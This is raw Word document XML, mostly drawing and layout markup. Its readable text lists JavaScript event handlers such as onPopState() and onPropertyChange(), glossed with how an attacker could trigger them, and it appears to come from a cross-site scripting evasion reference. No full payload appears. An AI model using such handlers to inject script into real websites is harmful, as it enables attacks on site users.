                <v:shape id="Freeform 943" o:spid="_x0000_s1492" style="position:absolute;left:1930;top:-601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UeRsUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPS4vCQBCE78L+h6EX9iLrRBExMRPxgbgHLz5YPDaZ&#10;NglmekJm1Oy/3xEEj0VVfUWl887U4k6tqywrGA4iEMS51RUXCk7HzfcUhPPIGmvLpOCPHMyzj16K&#10;ibYP3tP94AsRIOwSVFB63yRSurwkg25gG+LgXWxr0AfZFlK3+AhwU8tRFE2kwYrDQokNrUrKr4eb&#10;UbBbrot487v1Zzk6xf3reYk63yv19dktZiA8df4dfrV/tIJ4PITnmXA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R5GxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m805,182r-784,l18,181,,161r,-3l,21,21,,805,r21,21l826,161r-17,20l805,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="805,-418;21,-418;18,-419;0,-439;0,-442;0,-579;21,-600;805,-600;826,-579;826,-439;809,-419;805,-418" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 942" o:spid="_x0000_s1493" type="#_x0000_t202" style="position:absolute;left:1930;top:-601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SK8M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sJxN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0ivD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onPause()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14656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4445</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="687070" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="937" name="Group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070" cy="116205"/>
                          <a:chOff x="1930" y="7"/>
                          <a:chExt cx="1082" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="938" name="Freeform 940"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="7"/>
                            <a:ext cx="1082" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2991 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1082"/>
                              <a:gd name="T2" fmla="+- 0 189 7"/>
                              <a:gd name="T3" fmla="*/ 189 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1082"/>
                              <a:gd name="T6" fmla="+- 0 189 7"/>
                              <a:gd name="T7" fmla="*/ 189 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1082"/>
                              <a:gd name="T10" fmla="+- 0 189 7"/>
                              <a:gd name="T11" fmla="*/ 189 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1082"/>
                              <a:gd name="T14" fmla="+- 0 168 7"/>
                              <a:gd name="T15" fmla="*/ 168 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1082"/>
                              <a:gd name="T18" fmla="+- 0 165 7"/>
                              <a:gd name="T19" fmla="*/ 165 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1082"/>
                              <a:gd name="T22" fmla="+- 0 28 7"/>
                              <a:gd name="T23" fmla="*/ 28 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1082"/>
                              <a:gd name="T26" fmla="+- 0 7 7"/>
                              <a:gd name="T27" fmla="*/ 7 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2991 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1082"/>
                              <a:gd name="T30" fmla="+- 0 7 7"/>
                              <a:gd name="T31" fmla="*/ 7 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3012 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1082"/>
                              <a:gd name="T34" fmla="+- 0 28 7"/>
                              <a:gd name="T35" fmla="*/ 28 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3012 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1082"/>
                              <a:gd name="T38" fmla="+- 0 168 7"/>
                              <a:gd name="T39" fmla="*/ 168 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2994 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1082"/>
                              <a:gd name="T42" fmla="+- 0 189 7"/>
                              <a:gd name="T43" fmla="*/ 189 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2991 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1082"/>
                              <a:gd name="T46" fmla="+- 0 189 7"/>
                              <a:gd name="T47" fmla="*/ 1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2" h="183">
                                <a:moveTo>
                                  <a:pt x="106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061" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1082" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1082" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1064" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="106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Text Box 93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7"/>
                            <a:ext cx="108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onPopState()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8" o:spid="_x0000_s1494" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:.35pt;width:54.1pt;height:9.15pt;z-index:15814656;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,7" coordsize="108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">
                <v:shape id="Freeform 940" o:spid="_x0000_s1495" style="position:absolute;left:1930;top:7;width:1082;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="108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oxz8MA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCMBi+D/wP4RV2m6kTRu2MMgcOQQ/z47LbS/O2&#10;KWvelCTW6q9fDsKOD8/3YjXYVvTkQ+NYwXSSgSAunW64VnA+bV5yECEia2wdk4IbBVgtR08LLLS7&#10;8oH6Y6xFCuFQoAITY1dIGUpDFsPEdcSJq5y3GBP0tdQerynctvI1y96kxYZTg8GOPg2Vv8eLVVDb&#10;r7Xd7Krc7M/o75fvPp/9VEo9j4ePdxCRhvgvfri3WsF8ltamM+kI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oxz8MAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m1061,182l21,182r-3,l,161r,-3l,21,21,,1061,r21,21l1082,161r-18,21l1061,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1061,189;21,189;18,189;0,168;0,165;0,28;21,7;1061,7;1082,28;1082,168;1064,189;1061,189" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 939" o:spid="_x0000_s1496" type="#_x0000_t202" style="position:absolute;left:1930;top:7;width:108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Zr/MUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/IEb3VjBWmiq4i0UBCKMR48PrPP&#10;ZDH7Ns1uNf77rlDwOMzMN8xi1dtGXKnzxrGCyTgBQVw6bbhScCg+X99B+ICssXFMCu7kYbUcvCww&#10;0+7GOV33oRIRwj5DBXUIbSalL2uy6MeuJY7e2XUWQ5RdJXWHtwi3jXxLkpm0aDgu1NjSpqbysv+1&#10;CtZHzj/Mz/dpl59zUxRpwtvZRanRsF/PQQTqwzP83/7SCtJ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lmv8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onPopState()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15168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228600</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="687070" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="934" name="Group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070" cy="116205"/>
                          <a:chOff x="1930" y="360"/>
                          <a:chExt cx="1082" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="935" name="Freeform 937"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="359"/>
                            <a:ext cx="1082" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2991 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1082"/>
                              <a:gd name="T2" fmla="+- 0 542 360"/>
                              <a:gd name="T3" fmla="*/ 542 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1082"/>
                              <a:gd name="T6" fmla="+- 0 542 360"/>
                              <a:gd name="T7" fmla="*/ 542 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1082"/>
                              <a:gd name="T10" fmla="+- 0 541 360"/>
                              <a:gd name="T11" fmla="*/ 541 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1082"/>
                              <a:gd name="T14" fmla="+- 0 521 360"/>
                              <a:gd name="T15" fmla="*/ 521 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1082"/>
                              <a:gd name="T18" fmla="+- 0 518 360"/>
                              <a:gd name="T19" fmla="*/ 518 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1082"/>
                              <a:gd name="T22" fmla="+- 0 381 360"/>
                              <a:gd name="T23" fmla="*/ 381 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1082"/>
                              <a:gd name="T26" fmla="+- 0 360 360"/>
                              <a:gd name="T27" fmla="*/ 360 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2991 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1082"/>
                              <a:gd name="T30" fmla="+- 0 360 360"/>
                              <a:gd name="T31" fmla="*/ 360 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3012 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1082"/>
                              <a:gd name="T34" fmla="+- 0 381 360"/>
                              <a:gd name="T35" fmla="*/ 381 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3012 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1082"/>
                              <a:gd name="T38" fmla="+- 0 521 360"/>
                              <a:gd name="T39" fmla="*/ 521 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2994 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1082"/>
                              <a:gd name="T42" fmla="+- 0 541 360"/>
                              <a:gd name="T43" fmla="*/ 541 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2991 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1082"/>
                              <a:gd name="T46" fmla="+- 0 542 360"/>
                              <a:gd name="T47" fmla="*/ 54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2" h="183">
                                <a:moveTo>
                                  <a:pt x="106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061" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1082" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1082" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1064" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="106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Text Box 93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59"/>
                            <a:ext cx="108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onProgress()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5" o:spid="_x0000_s1497" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:18pt;width:54.1pt;height:9.15pt;z-index:15815168;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,360" coordsize="108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">
                <v:shape id="Freeform 937" o:spid="_x0000_s1498" style="position:absolute;left:1930;top:359;width:1082;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="108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ueUcYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRSE74X+h/AK3jTbimW7GqUVFKE9WOult8fm&#10;7WZx87IkcV3765uC0OMwM98wi9VgW9GTD41jBY+TDARx6XTDtYLj12acgwgRWWPrmBRcKcBqeX+3&#10;wEK7C39Sf4i1SBAOBSowMXaFlKE0ZDFMXEecvMp5izFJX0vt8ZLgtpVPWfYsLTacFgx2tDZUng5n&#10;q6C22ze7ea9y83FE/3Pe9/n0u1Jq9DC8zkFEGuJ/+NbeaQUv0xn8nU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EueUcYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m1061,182l21,182r-3,-1l,161r,-3l,21,21,,1061,r21,21l1082,161r-18,20l1061,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1061,542;21,542;18,541;0,521;0,518;0,381;21,360;1061,360;1082,381;1082,521;1064,541;1061,542" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 936" o:spid="_x0000_s1499" type="#_x0000_t202" style="position:absolute;left:1930;top:359;width:108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n/jsUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/KE3nSjhVBTV5GiIBSKMR48vmaf&#10;yWL2bcyumv77rlDwOMzMN8x82dtG3KjzxrGCyTgBQVw6bbhScCg2o3cQPiBrbByTgl/ysFy8DOaY&#10;aXfnnG77UIkIYZ+hgjqENpPSlzVZ9GPXEkfv5DqLIcqukrrDe4TbRk6TJJUWDceFGlv6rKk8769W&#10;werI+dpcvn92+Sk3RTFL+Cs9K/U67FcfIAL14Rn+b2+1gtlb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Cf+O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onProgress()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15680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444500</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1003300" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="931" name="Group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3300" cy="116205"/>
                          <a:chOff x="1930" y="700"/>
                          <a:chExt cx="1580" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="932" name="Freeform 934"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="699"/>
                            <a:ext cx="1580" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3489 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1580"/>
                              <a:gd name="T2" fmla="+- 0 882 700"/>
                              <a:gd name="T3" fmla="*/ 882 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1580"/>
                              <a:gd name="T6" fmla="+- 0 882 700"/>
                              <a:gd name="T7" fmla="*/ 882 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1580"/>
                              <a:gd name="T10" fmla="+- 0 881 700"/>
                              <a:gd name="T11" fmla="*/ 881 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1580"/>
                              <a:gd name="T14" fmla="+- 0 861 700"/>
                              <a:gd name="T15" fmla="*/ 861 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1580"/>
                              <a:gd name="T18" fmla="+- 0 858 700"/>
                              <a:gd name="T19" fmla="*/ 858 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1580"/>
                              <a:gd name="T22" fmla="+- 0 721 700"/>
                              <a:gd name="T23" fmla="*/ 721 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1580"/>
                              <a:gd name="T26" fmla="+- 0 700 700"/>
                              <a:gd name="T27" fmla="*/ 700 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3489 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1580"/>
                              <a:gd name="T30" fmla="+- 0 700 700"/>
                              <a:gd name="T31" fmla="*/ 700 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3510 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1580"/>
                              <a:gd name="T34" fmla="+- 0 721 700"/>
                              <a:gd name="T35" fmla="*/ 721 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3510 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1580"/>
                              <a:gd name="T38" fmla="+- 0 861 700"/>
                              <a:gd name="T39" fmla="*/ 861 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3492 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1580"/>
                              <a:gd name="T42" fmla="+- 0 881 700"/>
                              <a:gd name="T43" fmla="*/ 881 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3489 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1580"/>
                              <a:gd name="T46" fmla="+- 0 882 700"/>
                              <a:gd name="T47" fmla="*/ 88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80" h="183">
                                <a:moveTo>
                                  <a:pt x="155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559" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1580" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1580" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1562" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="155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Text Box 93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699"/>
                            <a:ext cx="158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onPropertyChange()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2" o:spid="_x0000_s1500" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:35pt;width:79pt;height:9.15pt;z-index:15815680;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,700" coordsize="158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">
                <v:shape id="Freeform 934" o:spid="_x0000_s1501" style="position:absolute;left:1930;top:699;width:1580;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="158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B/JcIA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UVeqsbI5Q2uoq0CL1JNb0/s88k&#10;mH0bd58x/fddQehxmJlvmMVqdJ0aKMTWs4HpJANFXHnbcm2g3G9e3kBFQbbYeSYDvxRhtXx8WGBh&#10;/ZW/adhJrRKEY4EGGpG+0DpWDTmME98TJ+/og0NJMtTaBrwmuOt0nmWv2mHLaaHBnj4aqk67izMQ&#10;cvGHWb+VLf60n4Muz/uqPBvz/DSu56CERvkP39tf1sD7LIfbmXQE9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H8lwgAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m1559,182l21,182r-3,-1l,161r,-3l,21,21,,1559,r21,21l1580,161r-18,20l1559,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1559,882;21,882;18,881;0,861;0,858;0,721;21,700;1559,700;1580,721;1580,861;1562,881;1559,882" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 933" o:spid="_x0000_s1502" type="#_x0000_t202" style="position:absolute;left:1930;top:699;width:158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5cFsQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74L/YXlCb7pRQTS6ihQLBaEY46HH1+wz&#10;Wcy+TbNbjf++Kwgeh5n5hlltOluLK7XeOFYwHiUgiAunDZcKTvnHcA7CB2SNtWNScCcPm3W/t8JU&#10;uxtndD2GUkQI+xQVVCE0qZS+qMiiH7mGOHpn11oMUbal1C3eItzWcpIkM2nRcFyosKH3iorL8c8q&#10;2H5ztjO/Xz+H7JyZPF8kvJ9dlHobdNsliEBdeIWf7U+tYDGd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+XBb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onPropertyChange()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(fires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3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navigated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session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>history)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>would</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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flash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>movie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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loading)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:line="182" w:lineRule="exact"/>
        <w:ind w:left="940"/>
      </w:pPr>
      <w:r>
        <w:t>(user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attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9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element</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>property)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="160" w:line="424" w:lineRule="auto"/>
        <w:ind w:left="97" w:right="2004" w:firstLine="1011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1392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1111250" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="928" name="Group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1250" cy="116205"/>
                          <a:chOff x="1930" y="166"/>
                          <a:chExt cx="1750" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="929" name="Freeform 931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1750" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3659 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1750"/>
                              <a:gd name="T2" fmla="+- 0 348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1750"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1750"/>
                              <a:gd name="T10" fmla="+- 0 348 166"/>
                              <a:gd name="T11" fmla="*/ 348 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1750"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1750"/>
                              <a:gd name="T18" fmla="+- 0 324 166"/>
                              <a:gd name="T19" fmla="*/ 324 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1750"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1750"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3659 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1750"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3680 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1750"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3680 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1750"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3662 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1750"/>
                              <a:gd name="T42" fmla="+- 0 348 166"/>
                              <a:gd name="T43" fmla="*/ 348 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3659 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1750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50" h="183">
                                <a:moveTo>
                                  <a:pt x="172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729" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1750" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1750" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1732" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="172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Text Box 93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175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onReadyStateChange()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9" o:spid="_x0000_s1503" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.3pt;width:87.5pt;height:9.15pt;z-index:-17602560;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,166" coordsize="175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">
                <v:shape id="Freeform 931" o:spid="_x0000_s1504" style="position:absolute;left:1930;top:166;width:1750;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="175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ZsJsQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT4vCMBTE7wt+h/AEb2uiiNhqFBH8w16WdWXPj+bZ&#10;FpuX2sS2fnuzsLDHYWZ+w6w2va1ES40vHWuYjBUI4syZknMNl+/9+wKED8gGK8ek4UkeNuvB2wpT&#10;4zr+ovYcchEh7FPUUIRQp1L6rCCLfuxq4uhdXWMxRNnk0jTYRbit5FSpubRYclwosKZdQdnt/LAa&#10;rt3x52M+U+HSqcNne0/K++K403o07LdLEIH68B/+a5+MhmSawO+ZeATk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2bCbEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m1729,182l21,182r-3,l,161r,-3l,21,21,,1729,r21,21l1750,161r-18,21l1729,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1729,348;21,348;18,348;0,327;0,324;0,187;21,166;1729,166;1750,187;1750,327;1732,348;1729,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 930" o:spid="_x0000_s1505" type="#_x0000_t202" style="position:absolute;left:1930;top:166;width:175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zCYcMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+C/sfwhN201QHop2xlDFBGIzV7rDjW/Ns&#10;Q5uXrom1+++Xw8Djx/d7n022EyMN3jhWsFomIIgrpw3XCj7L42ILwgdkjZ1jUvBLHrLDw2yPqXY3&#10;Lmg8h1rEEPYpKmhC6FMpfdWQRb90PXHkLm6wGCIcaqkHvMVw28l1kmykRcOxocGeXhqq2vPVKsi/&#10;uHg1P+/fH8WlMGW5S/ht0yr1OJ/yZxCBpnAX/7tPWsHuKc6P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zCYc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onReadyStateChange()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16704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321310</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="471170" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="925" name="Group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506"/>
                          <a:chExt cx="742" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="926" name="Freeform 928"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="506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689 506"/>
                              <a:gd name="T3" fmla="*/ 689 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 742"/>
                              <a:gd name="T6" fmla="+- 0 689 506"/>
                              <a:gd name="T7" fmla="*/ 689 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 742"/>
                              <a:gd name="T10" fmla="+- 0 688 506"/>
                              <a:gd name="T11" fmla="*/ 688 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 742"/>
                              <a:gd name="T14" fmla="+- 0 668 506"/>
                              <a:gd name="T15" fmla="*/ 668 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 742"/>
                              <a:gd name="T18" fmla="+- 0 664 506"/>
                              <a:gd name="T19" fmla="*/ 664 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 742"/>
                              <a:gd name="T22" fmla="+- 0 528 506"/>
